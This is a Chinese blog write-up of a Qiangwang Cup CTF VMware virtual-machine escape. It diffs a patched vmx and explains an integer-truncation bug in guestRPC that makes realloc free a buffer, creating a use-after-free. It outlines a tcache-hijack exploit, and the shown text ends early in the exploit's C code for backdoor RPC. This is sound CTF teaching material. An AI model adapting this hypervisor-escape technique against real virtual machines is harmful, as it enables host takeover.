

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" href="/img/head.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Epiphany">
  <meta name="keywords" content="">
  
    <meta name="description" content="本文首发于奇安信攻防社区:https:&#x2F;&#x2F;forum.butian.net&#x2F;share&#x2F;1678  0x00 前言初次分析虚拟机逃逸，之前分析了一篇rwctf2018，这次视线转到强网杯的一个虚拟机逃逸分析。难度比rw大一点点，但是逆向分析还是重点，所以也不会差到哪里去。 一些有关基础的链接放在这里，不做赘述。 题解 RPC&#x2F;backdoor机制 0x01 分析bindiff这类题目都">
<meta property="og:type" content="article">
<meta property="og:title" content="虚拟机逃逸（二）">
<meta property="og:url" content="http://example.com/2022/06/22/%E8%99%9A%E6%8B%9F%E6%9C%BA%E9%80%83%E9%80%B8%EF%BC%88%E4%BA%8C%EF%BC%89/index.html">
<meta property="og:site_name" content="Epiphany&#39;s blog">
<meta property="og:description" content="本文首发于奇安信攻防社区:https:&#x2F;&#x2F;forum.butian.net&#x2F;share&#x2F;1678  0x00 前言初次分析虚拟机逃逸，之前分析了一篇rwctf2018，这次视线转到强网杯的一个虚拟机逃逸分析。难度比rw大一点点，但是逆向分析还是重点，所以也不会差到哪里去。 一些有关基础的链接放在这里，不做赘述。 题解 RPC&#x2F;backdoor机制 0x01 分析bindiff这类题目都">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b49b8f237dd3d59e57968a503942f5b52a884c87.png">
<meta property="article:published_time" content="2022-06-21T16:43:07.000Z">
<meta property="article:modified_time" content="2022-06-21T17:01:27.889Z">
<meta property="article:author" content="Epiphany">
<meta property="article:tag" content="realworld">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b49b8f237dd3d59e57968a503942f5b52a884c87.png">
  
  
  
  <title>虚拟机逃逸（二） - Epiphany&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"😊","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Epiphany&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" href="javascript:;" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/CTF">
                    
                    CTF
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/CVE">
                    
                    CVE
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/chats">
                    
                    chats
                  </a>
                
              </div>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b49b8f237dd3d59e57968a503942f5b52a884c87.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="虚拟机逃逸（二）"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-06-22 00:43" pubdate>
          星期三, 六月 22日 2022, 12:43 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          <!-- compatible with older versions-->
          18k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          <!-- compatible with older versions-->
          151 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">虚拟机逃逸（二）</h1>
            
            
              <div class="markdown-body">
                
                <blockquote>
<p>本文首发于奇安信攻防社区:<a target="_blank" rel="noopener" href="https://forum.butian.net/share/1678">https://forum.butian.net/share/1678</a></p>
</blockquote>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>初次分析虚拟机逃逸，之前分析了一篇rwctf2018，这次视线转到强网杯的一个虚拟机逃逸分析。难度比rw大一点点，但是逆向分析还是重点，所以也不会差到哪里去。</p>
<p>一些有关基础的链接放在这里，不做赘述。</p>
<p><a target="_blank" rel="noopener" href="https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn.html">题解</a></p>
<p><a target="_blank" rel="noopener" href="http://sysprogs.com/legacy/articles/kdvmware/guestrpc.shtml">RPC&#x2F;backdoor机制</a></p>
<h2 id="0x01-分析"><a href="#0x01-分析" class="headerlink" title="0x01 分析"></a>0x01 分析</h2><h3 id="bindiff"><a href="#bindiff" class="headerlink" title="bindiff"></a>bindiff</h3><p>这类题目都会给一个patched的vmx文件，安装vmware后，在<code>/usr/lib/vmware/bin</code>目录下可以找到目标vmx。使用bindiff比较patched和patch之前的区别可以迅速定位漏洞的位置。</p>
<p>（bindiff分析太慢了，这次选择了010）</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-89eec2810b186d524efda555894cca9031ad35e7.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>有三处不同，ida定位到关键位置。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-18b396ee70885b34dc4b57846efde51baa0d1a1f.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>一处把r12d改成了r12w，相当于省略了r12的高位。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b9b1beba56c3803f31e032d2c8476ce9c7d9fda8.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>把跳转的条件改为了大于等于。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-a25862dfd05d6be26c03539e4ccba81caefc64ab.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>跳转改为了无条件。</p>
<p>最后一个改变，取消了条件检查，前两处patch改变如下。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-2c772477f3bc5dde104c35b1d042d567f8c8da28.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>本能的反应就是realloc函数的漏洞，这类题在常规pwn中很常见，realloc函数第二个size参数如果为0，则和free效果一样，常常会导致DF、UAF.接下来细看一下伪代码。</p>
<h3 id="ida分析"><a href="#ida分析" class="headerlink" title="ida分析"></a>ida分析</h3><p>Vmx漏洞依然位于guestRPC的处理函数中，该函数中使用了一个大的switch处理不同的信息。接下来详细分析。（虚拟机逃逸（一）中只给了分析的结构体）</p>
<p>关于一些基础知识可以看<a href="">虚拟机逃逸（一）</a></p>
<h4 id="Open-RPC-channel"><a href="#Open-RPC-channel" class="headerlink" title="Open_RPC_channel"></a>Open_RPC_channel</h4><p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-1f4c153972dee2b077f41122e57c31023c87979c.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>这是switch下最简单的一个分支了，打开信道，内容就是简单的接受数据包，然后获得magicnum（这部分是调试得到的）</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-4ac942da8b78bba6ed812cf7878a8b0b70561da5.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>magicnum会进行一个比较如果失败就直接退出。</p>
<h4 id="Send-RPC-command-length"><a href="#Send-RPC-command-length" class="headerlink" title="Send_RPC_command_length"></a>Send_RPC_command_length</h4><p>首先判断<code>byte_FE9584</code>，也是一个魔数，接着就判断长度。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-3612cc7def195cc1c26ad8199975b01b1c452eb0.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>长度为-1或者大于0x10000就会报错。如果RPCI的长度符合就会继续往下走。!</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-38b67aa4103d4bfdb748b0cab800ba051690af6b.png" srcset="/img/loading.gif" lazyload alt="图片.png"><br> 在这个判断中，比较56和21偏移处的值，v56为接收到的数据包，v21为现有长度，如果数据长度大于现有长度则realloc重新分配，设置空间大小为新的大小，且修改msg_struct。</p>
<p>漏洞就出在这个部分。漏洞存在的比较隐秘，大体属于整形溢出。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-ac0faf0ad5f12e77c733f85edc1914098b407865.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>此处，处理size的时候加入了LOWORD修饰，导致dword-&gt;word高位失去，所以如果设置v56&#x3D;0xffff则可以通过大小判断，然后LOWORD(0xffff+1)&#x3D;LOWORD(0x10000)&#x3D;0，则此时的realloc第二个参数为0，运行时重新回收ptr。也没有清0.导致了ptr的UAF利用。</p>
<h4 id="Send-RPC-command-data"><a href="#Send-RPC-command-data" class="headerlink" title="Send_RPC_command_data"></a>Send_RPC_command_data</h4><p>首先读入了需要发送的data指令，然后读取RPCI结构体，根据前面设置的长度，以不同的方式发送msg，一次最多发送四个字节，四个字节以内发送的方式都是一个byte一个byte的复制。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-36a2bba083009f75ce800f244312c2430730e108.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b5ba2447ff1d948dcf05d645861baddbc9ae0718.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>发送完指令之后，判断是否发送完，如果发送完了则进入指令处理，根据一个类似虚表的bss段指针，执行某个函数rw2018中，最后就是劫持了这样一个函数，让我们成功逃逸。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-163cb20a6e28b6d9bce90892deae335522c69b65.png" srcset="/img/loading.gif" lazyload alt="图片.png"><br> 处理完之后，flag标志为设置为1.具体的指令可以搜索字符串，之前分析的rw2018中也有相应的分析，这里就不赘述。</p>
<h4 id="Recieve-RPC-reply-length"><a href="#Recieve-RPC-reply-length" class="headerlink" title="Recieve_RPC_reply_length"></a>Recieve_RPC_reply_length</h4><p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-9589e548acbe430d797a4b712db305520f4cd8bd.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>guest获得，返回的长度，逻辑简单。</p>
<h4 id="Recieve-RPC-reply-data"><a href="#Recieve-RPC-reply-data" class="headerlink" title="Recieve_RPC_reply_data"></a>Recieve_RPC_reply_data</h4><p>执行指令之后返回的数据。</p>
<p>逻辑和发送差不多，同样的先收到长度，然后判断长度，一次接受四个字节，然后再把数据转移到缓冲区。最后设置flag为发送完毕。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-5554b4d6edff9e2280409f6bd2c8cd2c86fea21f.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h4 id="Finish-receiving-RPC-reply-amp-Close-RPC-channel"><a href="#Finish-receiving-RPC-reply-amp-Close-RPC-channel" class="headerlink" title="Finish_receiving_RPC_reply &amp; Close_RPC_channel"></a>Finish_receiving_RPC_reply &amp; Close_RPC_channel</h4><p>这两个部分也较为简单，前者在rw2018详细分析过，后者就是close channel。同时设置flag为1，整个指令处理发送接收流程结束。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>前面说过了，漏洞存在于realloc中，利用该UAF可以造成泄露等操作。实际上leak和利用的思路还是和rw差不多的。</p>
<p>此处的UAF位置在realloc环节也就是设置发送长度的环节，但是造成UAF leak虚表还是需要先设置一个0x100大小的缓冲区。</p>
<ul>
<li>开启channel A channel B</li>
<li>A设置buffer为0x100， B 使用info get也设置为0x100</li>
<li>然后set_len触发A漏洞，B get这个buffer，A再次触发漏洞。此时B 的buffer已经在tcache里了</li>
<li>调用dnd_vison函数写入虚表</li>
<li>leak</li>
</ul>
<p>漏洞利用也是和rw一样，直接tcache劫持即可</p>
<h2 id="0x02-exp"><a href="#0x02-exp" class="headerlink" title="0x02 exp"></a>0x02 exp</h2><p>主要的流程还是复制rw2018的，改动少部分即可。还是对师傅的脚本分析</p>
<p>leak函数</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-4b9fefc7745ee94ae07cccc09bfdcb91cf0fb928.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>完整的channel 0 发送指令</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-d6ac75d5867ddf6d2826a4909d4a23d798ecc4e9.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>channel发送部分info get</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-a5dfc228eaf5bbe1046ff8828591417ae8e7d130.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>free channel 0 的buffer，然后在channel 1realloc出来。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-cf4ca0bca038198b936f068479e3d7c86b304719.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>再次free</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-6101b8e1bf488c5b22fc638bf5ee6759f7e47d59.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>dnd_verison打入虚表</p>
<p>tcache劫持操作也是一样的，只是改掉了触发的位置。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdint.h&gt;</span></span><br><span class="hljs-type">void</span> <span class="hljs-title function_">channel_open</span><span class="hljs-params">(<span class="hljs-type">int</span> *cookie1,<span class="hljs-type">int</span> *cookie2,<span class="hljs-type">int</span> *channel_num,<span class="hljs-type">int</span> *res)</span>&#123;<br>    <span class="hljs-keyword">asm</span>(<span class="hljs-string">&quot;movl %%eax,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rdi,%%r10\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rsi,%%r11\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rdx,%%r12\n\t&quot;</span><br>        <span class="hljs-string">&quot;movq %%rcx,%%r13\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x564d5868,%%eax\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x49435052,%%ebx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x1e,%%ecx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl $0x5658,%%edx\n\t&quot;</span><br>        <span class="hljs-string">&quot;out %%eax,%%dx\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%edi,(%%r10)\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%esi,(%%r11)\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%edx,(%%r12)\n\t&quot;</span><br>        <span class="hljs-string">&quot;movl %%ecx,(%%r13)\n\t&quot;</span><br>        :<br>        :<br>        :<span class="hljs-string">&quot;%rax&quot;</span>,<span class="hljs-string">&quot;%rbx&quot;</span>,<span class="hljs-string">&quot;%rcx&quot;</span>,<span class="hljs-string">&quot;%rdx&quot;</span>,<span class="hljs-string">&quot;%rsi&quot;</span>,<span class="hljs-string">&quot;%rdi&quot;</span>,<span class="hljs-string">&quot;%r8&quot;</span>,<span class="hljs-string">&quot;%r10&quot;</span>,<span 